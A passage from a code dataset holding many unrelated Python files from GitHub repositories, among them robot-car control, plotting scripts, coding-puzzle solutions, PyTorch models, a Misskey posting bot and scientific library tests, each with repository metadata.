\"*zielDist,\"|\")\n \n if vorne < 10 and lastVorne < 10:\n bremsen()\n print(\"Bremsen!\")\n return\n elif vorne < 30 and lastVorne < 30:\n lenken(2)\n print(\"Lenken!\")\n time.sleep(.4)\n elif abs(lastDist-dist) < 20:\n lenken(steer)\n \ndef main():\n\n \n \n losfahren()\n pr.start(speed) # Motor A, speed% Tastverhältnis\n pl.start(speed) # Motor B, speed% Tastverhältnis\n \n run_event = threading.Event()\n run_event.set()\n \n th1_delay = .02 # sleep dauer der Funktion\n th1 = threading.Thread(target = wandfahren, args = (th1_delay,run_event)) # Funkton in einem neuen Thread zuordnen\n\n th1.start() # Thread starten\n\n # Warten bis Srtg+C gedrückt wird:\n try:\n time.sleep(1)\n \n except KeyboardInterrupt:\n print (\"attempting to close threads. Max wait =\", max(th1_delay,0)) # Bei mehreren Threads: 0 durch th2_delay erstzen\n run_event.clear()\n th1.join()\n aufraeumen()\n print (\"threads successfully closed\")\n\nif __name__ == '__main__':\n main()","repo_name":"MirCore/ITS-RaspberryCar","sub_path":"challenges/challenge2_funktioniert.py","file_name":"challenge2_funktioniert.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"9522996955","text":"import json\nimport logging\nimport urlparse\n\nfrom handlers.BaseHandler import BaseHandler\nfrom models.GoogleDocsChange import GoogleDocsChange\n\n\nclass NotificationCallbackHandler(BaseHandler):\n \"\"\"\n Request handling class for /notification\n \"\"\"\n\n def post(self):\n \"\"\"\n POST request handling method.\n\n Stores incoming changes using GAE datastore API\n \"\"\"\n\n # Ignore sync message.\n if self.request.headers['X-Goog-Resource-State'] == 'sync':\n return\n\n # Receive user_id and change_id\n user_id = dict(urlparse.parse_qsl(self.request.headers['X-Goog-Channel-Token']))['user_id']\n change_id = json.loads(self.request.body)['id']\n\n logging.debug(\"User id receiving change: {0}\".format(str(user_id)))\n logging.debug(\"change id: {0}\".format(str(change_id)))\n\n entity = GoogleDocsChange.get_or_insert(str(user_id), user_id=user_id)\n if change_id not in entity.change_ids:\n entity.change_ids.append(change_id)\n entity.save()\n self.response.set_status(200)","repo_name":"Doxxer/AUGoogleNotifier","sub_path":"AppServer/handlers/NotificationCallbackHandler.py","file_name":"NotificationCallbackHandler.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33047259534","text":"####\nfrom scipy.signal import savgol_filter as sgfilter\nfrom numpy import *\nfrom matplotlib.pyplot import *\n\nimport glob\nimport os\n\ncolors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf']\n\nall_files = glob.glob('logs/*.npy')\nfig, ax = subplots(3)\nax[0].set_title('Train losses')\nax[0].set_ylabel('loss')\nax[0].grid()\n\nax[1].set_title('Valid losse')\nax[1].set_ylim(0,1)\nax[1].set_ylabel('loss')\nax[1].grid()\n\n\nax[2].set_title('Acurracy')\nax[2].set_ylabel('%')\nax[2].set_xlabel('Train step')\nax[2].grid()\n\n\nfor num, each_log in enumerate(all_files):\n MODEl_NAME = os.path.basename(each_log)[:-4]\n print(num+1,MODEl_NAME)\n datas = np.load(each_log,allow_pickle=True)\n \n\n for index,each_data in enumerate(datas):\n this_x = range(1,len(each_data)+1 )\n\n if (len(each_data)>51):\n \tax[index].plot(this_x, sgfilter(each_data,51,2) ,\"-\" , color=colors[num] ,label=MODEl_NAME )\n elif (len(each_data)>3):\n \tax[index].plot(this_x, sgfilter(each_data,3,1) ,\"-\" , color=colors[num] ,label=MODEl_NAME )\n else:\n \tax[index].plot(this_x, each_data ,\"-\" , color=colors[num] ,label=MODEl_NAME )\n\n ax[index].plot(this_x, each_data ,\"-\" ,alpha = 0.2, color=colors[num])\n ax[index].legend(fontsize=8)\n\nfig.autofmt_xdate()\nfig.tight_layout()\nshow()\n\n\n","repo_name":"OuYangMinOa/AI-play-kartrider-shift","sub_path":"show_log.py","file_name":"show_log.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"384865332","text":"\"\"\"Kata url: https://www.codewars.com/kata/523a86aa4230ebb5420001e1.\"\"\"\n\nfrom typing import List\n\n\ndef anagrams(word: str, words: List[str]) -> List[str]:\n sorted_word: List[str] = sorted(word)\n return [wrd for wrd in words if sorted(wrd) == sorted_word]\n\n\ndef test_anagrams():\n assert anagrams(\"abba\", [\"aabb\", \"abcd\", \"bbaa\", \"dada\"]) == [\"aabb\", \"bbaa\"]\n assert anagrams(\"racer\", [\"crazer\", \"carer\", \"racar\", \"caers\", \"racer\"]) == [\n \"carer\",\n \"racer\",\n ]\n","repo_name":"Sigmanificient/codewars","sub_path":"src/python/katas/py5kyu/where_my_anagrams_at.py","file_name":"where_my_anagrams_at.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"23384677371","text":"import sys\r\n\r\n\r\ndef solve(instream):\r\n board = [instream.readline().strip() for x in range(4)]\r\n instream.readline()\r\n\r\n for ch in (\"X\", \"O\"):\r\n won = False\r\n for row in range(4):\r\n won = won or all(x in (ch, \"T\") for x in board[row])\r\n\r\n for col in range(4):\r\n won = won or all(x[col] in (ch, \"T\") for x in board)\r\n\r\n won = won or all(board[i][i] in (ch, \"T\") for i in range(4))\r\n won = won or all(board[3 - i][i] in (ch, \"T\") for i in range(4))\r\n if won:\r\n return \"{} won\".format(ch)\r\n\r\n completed = all([all(cell != \".\" for cell in row) for row in board])\r\n if completed:\r\n return \"Draw\"\r\n else:\r\n return \"Game has not completed\"\r\n\r\ndef run():\r\n cases = int(sys.stdin.readline().strip())\r\n for i in range(cases):\r\n print(\"Case #{}: {}\".format(i + 1, solve(sys.stdin)))\r\n\r\nif __name__ == \"__main__\":\r\n run()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/648.py","file_name":"648.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74179078914","text":"from typing import (Sequence,\n Type,\n Union)\n\nfrom .hints import (Empty,\n Linear,\n Maybe,\n Mix,\n Multipoint,\n Multisegment,\n Point,\n Segment,\n Shaped)\n\n\ndef pack_mix(discrete: Maybe[Multipoint],\n linear: Maybe[Linear],\n shaped: Maybe[Shaped],\n empty: Empty,\n mix_cls: Type[Mix]\n ) -> Union[Empty, Linear, Mix, Multipoint, Shaped]:\n return (mix_cls(discrete, linear, shaped)\n if (((discrete is not empty) + (linear is not empty)\n + (shaped is not empty)) >= 2)\n else (discrete\n if discrete is not empty\n else (linear\n if linear is not empty\n else shaped)))\n\n\ndef pack_points(points: Sequence[Point],\n empty: Empty,\n multipoint_cls: Type[Multipoint]) -> Maybe[Multipoint]:\n return multipoint_cls(points) if points else empty\n\n\ndef pack_segments(segments: Sequence[Segment],\n empty: Empty,\n multisegment_cls: Type[Multisegment]\n ) -> Union[Empty, Multisegment, Segment]:\n return ((multisegment_cls(segments)\n if len(segments) > 1\n else segments[0])\n if segments\n else empty)\n","repo_name":"lycantropos/ground","sub_path":"ground/core/packing.py","file_name":"packing.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"16806524343","text":"# 소수 카운팅 함수\ndef count_prime(N):\n count = 0\n # N과 2N 사이의 범위 \n for n in range(N+1, 2*N+1):\n if prime[n]:\n count += 1\n return count\n\n# 제한 범위 내의 소수를 미리 계산해둠\nn = 123456 * 2 + 1\nprime = [True] * n\n# 소수인지 판별할 숫자의 제곱근\n# 제곱근이 대략 약수 중간이기 때문 \nfor i in range(2, int(n**0.5)+1):\n # 과거의 계산으로 i가 소수가 아니라면 처리하지 않음\n # i가 소수가 아니라면 i의 배수도 전부 소수가 아닌 상태\n if prime[i]:\n # 에라토스테네스 체로 소수 아닌 숫자 거르기\n # i의 배수를 전부 소수가 아닌 것으로 처리\n for j in range(2*i, n, i):\n prime[j] = False\n\n# 테스트 데이터 입력\nNum = []\nwhile True:\n N = int(input())\n if N == 0:\n break\n Num.append(N)\n\n# 연산\nfor N in Num:\n print(count_prime(N))\n","repo_name":"joney0715/Algorithm_GroupStudy","sub_path":"joney0715/0803/common_BOJ_4948_베르트랑공준.py","file_name":"common_BOJ_4948_베르트랑공준.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9570620848","text":"n=int(input())\narr=list(map(int,input().strip().split()))\n#print(arr)\na,b=map(int,input().split())\n#print(a,b)\nf=0\nfor i in range(n):\n if arr[i]>=a and arr[i]<=b:\n print(arr[i],end=' ')\n f=1\nif f==0:\n print(\"-1\")\n","repo_name":"Sudheer0581/codemind-python","sub_path":"elements_in_between_A_and_B.py","file_name":"elements_in_between_A_and_B.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15796184684","text":"import object_database._types as _types\n\nfrom object_database.object import Index, Indexed\nfrom types import FunctionType\nfrom typed_python import ConstDict, NamedTuple, Tuple, TupleOf, serialize\n\n\nObjectId = int\nFieldId = int\nObjectFieldId = NamedTuple(objId=int, fieldId=int, isIndexValue=bool)\nIndexValue = bytes\nIndexId = NamedTuple(fieldId=int, indexValue=IndexValue)\nDatabaseObjectBase = NamedTuple(_identity=int)\n\nTypeDefinition = NamedTuple(fields=TupleOf(str), indices=TupleOf(str))\nSchemaDefinition = ConstDict(str, TypeDefinition)\n\nFieldDefinition = NamedTuple(schema=str, typename=str, fieldname=str)\n\n\ndef SubscribeLazilyByDefault(t):\n t.__object_database_lazy_subscription__ = True\n return t\n\n\ndef indexValueFor(type, value, serializationContext=None):\n return serialize(type, value, serializationContext)\n\n\nclass Schema:\n \"\"\"A collection of types that can be used to access data in a database.\"\"\"\n\n def __init__(self, name):\n self._name = name\n\n # Map: typename:str -> cls\n self._types = {}\n\n # set of typename that still need definition\n self._undefinedTypes = set()\n\n # Map: typename:str -> type\n # contains types we have defined on the schema that are not\n # DatabaseObject types.\n self._supportingTypes = {}\n\n # class -> indexname -> tuple(str)\n self._indices = {}\n\n # class -> indexname -> tuple(str)\n self._index_types = {}\n\n # class -> fieldname -> type\n self._field_types = {}\n\n self._frozen = False\n\n # Map: cls -> original_cls\n self._types_to_original = {}\n\n def toDefinition(self):\n return SchemaDefinition(\n {\n tname: self.typeToDef(t)\n for tname, t in self._types.items()\n if getattr(t, \"__is_database_object_type__\", False)\n }\n )\n\n def __repr__(self):\n return \"Schema(%s)\" % self.name\n\n def lookupFullyQualifiedTypeByName(self, name):\n if not name.startswith(self.name + \".\"):\n return None\n return self._types.get(name[len(self.name) + 1 :])\n\n def typeToDef(self, t):\n return TypeDefinition(\n fields=sorted(self._field_types[t.__name__]),\n indices=sorted(self._indices[t.__name__]),\n )\n\n def getType(self, t):\n return self._types.get(t)\n\n def fieldType(self, typename, fieldname):\n \"\"\"Return the type of the field named 'fieldname' in 'typename'.\n\n If the field or type is unknown, return None.\n \"\"\"\n return self._field_types.get(typename, {}).get(fieldname, None)\n\n def indexType(self, typename, fieldname):\n \"\"\"Return the type of the field named 'fieldname' in 'typename'.\n\n If the field or type is unknown, return None.\n \"\"\"\n return self._index_types.get(typename, {}).get(fieldname, None)\n\n @property\n def name(self):\n return self._name\n\n def freeze(self):\n if not self._frozen:\n assert not self._undefinedTypes, \"Still need definitions for %s\" % (\n \", \".join(self._undefinedTypes)\n )\n self._frozen = True\n\n def __setattr__(self, typename, val):\n if typename.startswith(\"_\"):\n self.__dict__[typename] = val\n return\n\n assert not self._frozen, \"Schema is already frozen.\"\n\n assert isinstance(val, type)\n\n self._supportingTypes[typename] = val\n\n def __getattr__(self, typename):\n assert \".\" not in typename\n\n if typename.startswith(\"_\"):\n return self.__dict__[typename]\n\n if typename in self._supportingTypes:\n return self._supportingTypes[typename]\n\n if typename not in self._types:\n if self._frozen:\n raise AttributeError(typename)\n\n cls = _types.createDatabaseObjectType(self, typename)\n\n self._types[typename] = cls\n self._indices[typename] = {}\n self._index_types[typename] = {}\n self._field_types[typename] = {}\n\n self._undefinedTypes.add(typename)\n\n return self._types[typename]\n\n def define(self, cls):\n typename = cls.__name__\n\n assert not typename.startswith(\n \"_\"\n ), \"Illegal to use _ for first character in database classnames.\"\n assert not self._frozen, \"Schema is already frozen\"\n\n # get a type stub\n t = getattr(self, typename)\n\n # add the canonical ' exists' property, which we use under the hood to indicate\n # existence/deletion of an object.\n self._field_types[typename][\" exists\"] = bool\n self._indices[typename][\" exists\"] = (\" exists\",)\n self._index_types[typename][\" exists\"] = bool\n\n t.setModule(cls.__module__)\n t.addField(\" exists\", bool)\n t.addIndex(\" exists\", (\" exists\",))\n\n # make sure it's not defined yet\n assert typename in self._undefinedTypes, f\"Type {typename} is not undefined.\"\n self._undefinedTypes.discard(typename)\n\n self._types_to_original[t] = cls\n\n # compute baseClasses in order to collect the type's attributes but filter out\n # object and the DatabaseObjectBase\n baseClasses = [x for x in cls.__mro__ if x not in (object, DatabaseObjectBase)]\n\n properBaseClasses = [self._types_to_original.get(b, b) for b in baseClasses]\n\n # Collect the type's attributes and populate the actual type object\n # Map: name -> type\n classMembers = {}\n\n for base in reversed(properBaseClasses):\n for name, val in base.__dict__.items():\n classMembers[name] = val\n\n for name, val in classMembers.items():\n isMagic = name[:2] == \"__\"\n\n if isinstance(val, type) and not isMagic:\n t.addField(name, val)\n self._field_types[typename][name] = val\n elif isinstance(val, Indexed):\n t.addField(name, val.obj)\n t.addIndex(name, (name,))\n self._field_types[typename][name] = val.obj\n self._indices[typename][name] = (name,)\n self._index_types[typename][name] = val.obj\n elif isinstance(val, Index):\n # do this in a second pass\n pass\n elif isinstance(val, property):\n t.addProperty(name, val.fget, val.fset)\n elif isinstance(val, staticmethod):\n t.addStaticMethod(name, val.__func__)\n elif isinstance(val, classmethod):\n\n def bind(func, t):\n def inner(*args, **kwargs):\n return func(t, *args, **kwargs)\n\n inner.__name__ = func.__name__\n inner.__qualname__ = func.__qualname__\n inner.__doc__ = func.__doc__\n\n return inner\n\n t.addStaticMethod(name, bind(val.__func__, t))\n elif isinstance(val, FunctionType):\n t.addMethod(name, val)\n\n for name, val in classMembers.items():\n if isinstance(val, Index):\n t.addIndex(name, tuple(val.names))\n assert len(val.names)\n\n self._indices[typename][name] = tuple(val.names)\n\n if len(val.names) > 1:\n self._index_types[typename][name] = Tuple(\n *[self._field_types[typename][fieldname] for fieldname in val.names]\n )\n else:\n self._index_types[typename][name] = self._field_types[typename][\n val.names[0]\n ]\n\n t.finalize()\n\n if hasattr(cls, \"__object_database_lazy_subscription__\"):\n t.markLazyByDefault()\n\n return t\n","repo_name":"APrioriInvestments/object_database","sub_path":"object_database/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7837,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"41190968223","text":"import FWCore.ParameterSet.Config as cms\n\nPrescaleService = cms.Service('PrescaleService',\n lvl1Labels = cms.vstring('default'),\n prescaleTable = cms.VPSet(\n cms.PSet(\n pathName = cms.string('HLTPath'),\n prescales = cms.vuint32(1)\n )\n ),\n lvl1DefaultLabel = cms.string('default'),\n forceDefault = cms.bool(False)\n)\n","repo_name":"cms-sw/cmssw-cfipython","sub_path":"FWCore/PrescaleService/PrescaleService_cfi.py","file_name":"PrescaleService_cfi.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5795676472","text":"import torch\nimport torch.nn as nn\n\nclass Seq2Seq(nn.Module):\n\tdef __init__(\n\t\tself,\n\t\tinput_dim: int,\n\t\thidden_dim: int,\n\t\toutput_dim: int,\n\t\tnum_layers: int) -> None:\n\t\tsuper(Seq2Seq, self).__init__()\n\n\t\tself.rnn = nn.GRU(input_dim, hidden_dim, num_layers, batch_first=True)\n\t\tself.dnn = nn.Sequential(\n\t\t\tnn.Linear(hidden_dim, output_dim)\n\t\t)\n\n\tdef forward(self, seq: torch.Tensor) -> torch.Tensor:\n\t\t# seq: [bs, seq_len, input_dim]\n\t\toutput, hn = self.rnn(seq)\n\t\toutput = self.dnn(output)\n\t\treturn output\n\n\nclass Seq2Val(nn.Module):\n\tdef __init__(\n\t\tself,\n\t\tinput_dim: int,\n\t\thidden_dim: int,\n\t\toutput_dim: int,\n\t\tnum_layers: int) -> None:\n\t\tsuper(Seq2Val, self).__init__()\n\n\t\tself.rnn = nn.GRU(input_dim, hidden_dim, num_layers, batch_first=True)\n\t\tself.dnn = nn.Sequential(\n\t\t\tnn.Linear(hidden_dim, output_dim),\n\t\t)\n\n\tdef forward(self, seq: torch.Tensor) -> torch.Tensor:\n\t\t# seq: [bs, seq_len, input_dim]\n\t\toutput, hn = self.rnn(seq)\n\t\toutput = output[:, -1, :]\n\t\toutput = self.dnn(output)\n\t\treturn output \n\t\t\n\nclass Val2Val(nn.Module):\n\tdef __init__(\n\t\tself, \n\t\tinput_dim: int,\n\t\thidden_dim: int, \n\t\toutput_dim: int, \n\t\tnum_layers: int) -> None:\n\t\tsuper().__init__()\n\n\t\tmodel = []\n\t\tfor n in range(num_layers):\n\t\t\tcur_in_dim = input_dim if n==0 else hidden_dim\n\t\t\tcur_out_dim = output_dim if n==num_layers-1 else hidden_dim\n\t\t\tmodel.append(nn.Linear(cur_in_dim, cur_out_dim))\n\t\t\tif n!=num_layers-1:\n\t\t\t\tmodel.append(nn.ReLU())\n\t\t\telse:\n\t\t\t\tmodel.append(nn.Sigmoid())\n\t\tself.model = nn.Sequential(*model)\n\n\tdef forward(self, val: torch.Tensor) -> torch.Tensor:\n\t\t# val: [bs, seq_len, input_dim]\n\t\toutput = self.model(val)\n\t\treturn output\n","repo_name":"hkberlin/nasa-hackathon-whats-new","sub_path":"model3/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4070598426","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 19-05-2012\n\n@author: winx\n'''\nfrom numpy import *\nfrom numpy.random import *\nfrom numpy.ma.core import floor, log\nfrom HistogramPlot.PlotHist import PlotHist\n\n \nclass Geometric(object):\n '''\n Generator geometryczny\n '''\n\n def __init__(self,p):\n self.p = p\n self.name = 'Rozkład geometryczny'\n \n def getP(self):\n return self.p\n \n def getName(self):\n return self.name \n \n \n def showIntGenAndCount(self,list):\n '''\n wypisuje liste wylosowanych liczb\n '''\n R = []\n index = 0\n for i in list:\n if i != 0:\n for l in range(i):\n R.append(index)\n index=index+1\n return R\n \n def probabilityChart(self, X):\n '''\n y dla wykresu prawdopodobienstwa\n '''\n g = []\n for l in X:\n P = self.p*(pow(1-self.p,l))\n g.append(P)\n return g\n \n def generateInt(self, k):\n '''\n generowanie k liczb\n '''\n T = [0]*k\n for i in range(k):\n U = uniform(low=0, high=1)\n X = log(U)/log(1-self.p)\n T[(int(floor(X)))] = T[(int(floor(X)))] + 1\n return T\n \n \n#A = Geometric(0.1)\n#C = A.showIntGenAndCount(A.generateInt(100)) \n#P = A.probabilityChart(C) \n#A = PlotHist()\n#A.plotHistgram(\"Generator dwumianowy\", C,P,1,'ilosc','liczby')\n#A.showHistogram()","repo_name":"winx88/ProjectsPythonDjango","sub_path":"MMProjectOnePY/Generators/Geometric.py","file_name":"Geometric.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"434888579","text":"#Write a Python program to calculate the area of a parallelogram\r\n\r\ndef parallelogram(b,h):\r\n if b or h>0:\r\n area=round(b*h)\r\n print(area)\r\n\r\n\r\n\r\nprint(parallelogram(10,5))","repo_name":"ShyamP1112/Shyam_06sept_python","sub_path":"Module 3/question3.60.py","file_name":"question3.60.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41638342188","text":"import openpnm as op\nimport numpy as _np\nfrom numpy.testing import assert_allclose\n\n\nclass HydraulicConductanceTest:\n def setup_class(self):\n self.net = op.network.Cubic(shape=[5, 5, 5], spacing=1.0)\n self.geo = op.geometry.GenericGeometry(network=self.net,\n pores=self.net.Ps,\n throats=self.net.Ts)\n self.geo['pore.diameter'] = 1.0\n self.geo['throat.diameter'] = 0.5\n self.geo['pore.area'] = 1.0\n self.geo['throat.area'] = 0.5\n self.phase = op.phases.GenericPhase(network=self.net)\n self.phase['pore.viscosity'] = 1e-5\n self.phys = op.physics.GenericPhysics(network=self.net,\n phase=self.phase,\n geometry=self.geo)\n\n def teardown_class(self):\n mgr = op.Workspace()\n mgr.clear()\n\n def test_hagen_poiseuille(self):\n self.geo['throat.conduit_lengths.pore1'] = 0.25\n self.geo['throat.conduit_lengths.throat'] = 0.6\n self.geo['throat.conduit_lengths.pore2'] = 0.15\n mod = op.models.physics.hydraulic_conductance.hagen_poiseuille\n self.phys.add_model(propname='throat.hydraulic_conductance', model=mod)\n actual = self.phys['throat.hydraulic_conductance'].mean()\n assert_allclose(actual, desired=1421.0262776)\n\n def test_generic_hydraulic(self):\n # Pass size factors as dict\n self.geo['throat.hydraulic_size_factors'] = {\n \"pore1\": 0.123, \"throat\": 0.981, \"pore2\": 0.551\n }\n mod = op.models.physics.hydraulic_conductance.generic_hydraulic\n self.phys.add_model(propname='throat.g_hydraulic_conductance', model=mod)\n self.phys.regenerate_models()\n actual = self.phys['throat.g_hydraulic_conductance'].mean()\n assert_allclose(actual, desired=9120.483231751232)\n # Pass size factors as an array\n for elem in [\"pore1\", \"throat\", \"pore2\"]:\n del self.geo[f\"throat.hydraulic_size_factors.{elem}\"]\n self.geo['throat.hydraulic_size_factors'] = 0.896\n self.phys.regenerate_models(\"throat.g_hydraulic_conductance\")\n actual = self.phys['throat.g_hydraulic_conductance'].mean()\n assert_allclose(actual, desired=89600.0)\n\n def test_hagen_poiseuille_2d(self):\n self.geo['throat.conduit_lengths.pore1'] = 0.25\n self.geo['throat.conduit_lengths.throat'] = 0.6\n self.geo['throat.conduit_lengths.pore2'] = 0.15\n mod = op.models.physics.hydraulic_conductance.hagen_poiseuille_2d\n self.phys.add_model(propname='throat.hydraulic_conductance', model=mod)\n actual = self.phys['throat.hydraulic_conductance'].mean()\n assert_allclose(actual, desired=1602.564)\n\n def test_hagen_poiseuille_zero_length_throat(self):\n self.geo['throat.conduit_lengths.pore1'] = 0.25\n self.geo['throat.conduit_lengths.throat'] = 0.0\n self.geo['throat.conduit_lengths.pore2'] = 0.15\n mod = op.models.physics.hydraulic_conductance.hagen_poiseuille\n self.phys.add_model(propname='throat.hydraulic_conductance',\n model=mod)\n actual = self.phys['throat.hydraulic_conductance'].mean()\n assert_allclose(actual, desired=9947.1839)\n\n def test_classic_hagen_poiseuille(self):\n self.geo['pore.diameter'] = 1.0\n self.geo['throat.diameter'] = 1.0\n self.geo['throat.length'] = 1.0e-9\n self.air = op.phases.Air(network=self.net)\n self.phys = op.physics.GenericPhysics(network=self.net,\n phase=self.air,\n geometry=self.geo)\n mod = op.models.physics.hydraulic_conductance.classic_hagen_poiseuille\n self.phys.add_model(propname='throat.conductance',\n model=mod)\n assert _np.allclose(a=self.phys['throat.conductance'][0],\n b=1330.68207684)\n\n def test_valvatne_blunt(self):\n self.phase = op.phases.GenericPhase(network=self.net)\n self.phase['pore.viscosity'] = 1e-5\n self.phys = op.physics.GenericPhysics(network=self.net,\n phase=self.phase,\n geometry=self.geo)\n mod = op.models.physics.hydraulic_conductance.valvatne_blunt\n sf = _np.sqrt(3) / 36.0\n self.geo['pore.shape_factor'] = _np.ones(self.geo.Np) * sf\n self.geo['throat.shape_factor'] = _np.ones(self.geo.Nt) * sf\n self.phys.add_model(propname='throat.valvatne_conductance', model=mod)\n actual = self.phys['throat.valvatne_conductance'].mean()\n desired = 1030.9826 # This is the old value\n desired = 7216.8783 # This is what it gets now\n assert_allclose(actual, desired=desired)\n\n\nif __name__ == '__main__':\n\n t = HydraulicConductanceTest()\n self = t\n t.setup_class()\n for item in t.__dir__():\n if item.startswith('test'):\n print(f'Running test: {item}')\n t.__getattribute__(item)()\n","repo_name":"halotudio/openPNM-copy2","sub_path":"tests/unit/models/physics/HydraulicConductanceTest.py","file_name":"HydraulicConductanceTest.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74822303875","text":"# coding: utf-8\r\n\r\nfrom misskey import Misskey\r\n\r\nimport random\r\nimport os\r\nimport time\r\n\r\n#使える文字のリスト\r\nhiragana = ['ぁ', 'あ', 'ぃ', 'い', 'ぅ', 'う', 'ぇ', 'え', 'ぉ', 'お', 'か', 'が', 'き', 'ぎ', 'く', 'ぐ', 'け', 'げ', 'こ', 'ご', 'さ', 'ざ', 'し', 'じ', 'す', 'ず', 'せ', 'ぜ', 'そ', 'ぞ', 'た', 'だ', 'ち', 'ぢ', 'っ', 'つ', 'づ', 'て', 'で', 'と', 'ど', 'な', 'に', 'ぬ', 'ね', 'の', 'は', 'ば', 'ぱ', 'ひ', 'び', 'ぴ', 'ふ', 'ぶ', 'ぷ', 'へ', 'べ', 'ぺ', 'ほ', 'ぼ', 'ぽ', 'ま', 'み', 'む', 'め', 'も', 'ゃ', 'や', 'ゅ', 'ゆ', 'ょ', 'よ', 'ら', 'り', 'る', 'れ', 'ろ', 'ゎ', 'わ', 'ゐ', 'ゑ', 'を', 'ん','ー']\r\n\r\n#初句.二句.結句をそれぞれ作成\r\nsyoku = ''.join(random.choices(hiragana,k=5))\r\nniku = ''.join(random.choices(hiragana,k=7))\r\nkekku = ''.join(random.choices(hiragana,k=5))\r\n\r\n#できた川柳\r\nwhile True:\r\n try:\r\n misskey_address = os.environ.get(\"MISSKEY_SERVER_ADDRESS\")\r\n misskey_token = os.environ.get(\"MISSKEY_TOKEN\")\r\n senryu = Misskey(misskey_address)\r\n senryu.token = misskey_token\r\n senryu.notes_create(text=syoku+\"\\n\"+niku+\"\\n\"+kekku)\r\n except:\r\n time.sleep(300)\r\n else:\r\n break\r\nprint(syoku+\"\\n\"+niku+\"\\n\"+kekku)\r\n","repo_name":"BlossomsArchive/575","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72443678914","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision.models import resnet50\n\n# https://blog.csdn.net/qq_36530992/article/details/102628455?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522166029678316782388042242%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=166029678316782388042242&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-102628455-null-null.142^v40^pc_rank_34_queryrelevant0,185^v2^control&utm_term=aspp&spm=1018.2226.3001.4187\n\n\n# 借鉴 torchvision 库手写的 ResNet50, 备用(文件中要求从零实现)\n# ResNet 中不使用 bias, 是由于 bn 层的存在, bias 不起作用\nclass ResNet_Head(nn.Module):\n def __init__(self,v1c=True):\n super().__init__()\n\n if v1c:\n self.conv = nn.Sequential(\n nn.Conv2d(3,64,kernel_size=3,stride=2,padding=1,bias=False),\n nn.Conv2d(64,64,kernel_size=3,stride=1,padding=1,bias=False),\n nn.Conv2d(64,64,kernel_size=3,stride=1,padding=1,bias=False)\n )\n\n else:\n self.conv = nn.Conv2d(3,64,kernel_size=7,stride=2,padding=3,bias=False)\n\n self.bn_conv = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n # ceil_mode 会在pooling时, 将最后小于卷积核大小的边界保留下来另外计算, 等同于自适应padding\n self.maxpool = nn.MaxPool2d(kernel_size=3,stride=2,padding=0,ceil_mode=True)\n\n\n def forward(self,x):\n output = self.conv(x)\n output = self.bn_conv(output)\n output = self.relu(output)\n output = self.maxpool(output)\n \n return output\n\nclass ResNet_bottleneck(nn.Module):\n def __init__(self,input_c,middle_c,output_c,stride=1,dilation=1):\n super().__init__()\n\n # 若需下采样 或 输入输出通道数不等,则残差链路需要1*1卷积控制通道数\n self.branch_conv = (stride != 1) or (input_c != output_c)\n\n if stride != 1:\n self.point_conv1 = nn.Conv2d(input_c,middle_c,kernel_size=1,stride=stride,bias=False)\n else:\n self.point_conv1 = nn.Conv2d(input_c,middle_c,kernel_size=1,bias=False)\n\n self.bn1 = nn.BatchNorm2d(middle_c)\n self.conv = nn.Conv2d(middle_c,middle_c,kernel_size=3,stride=1,padding=dilation,bias=False,dilation=dilation)\n self.bn2 = nn.BatchNorm2d(middle_c)\n self.point_conv2 = nn.Conv2d(middle_c,output_c,kernel_size=1,bias=False)\n self.bn3 = nn.BatchNorm2d(output_c)\n self.act = nn.ReLU(inplace=True)\n\n if self.branch_conv:\n if stride != 1:\n self.point_conv_ = nn.Conv2d(input_c,output_c,kernel_size=1,stride=stride,bias=False)\n else:\n self.point_conv_ = nn.Conv2d(input_c,output_c,kernel_size=1,bias=False)\n self.bn_ = nn.BatchNorm2d(output_c)\n\n\n def forward(self,x):\n y = self.point_conv1(x)\n y = self.bn1(y)\n y = 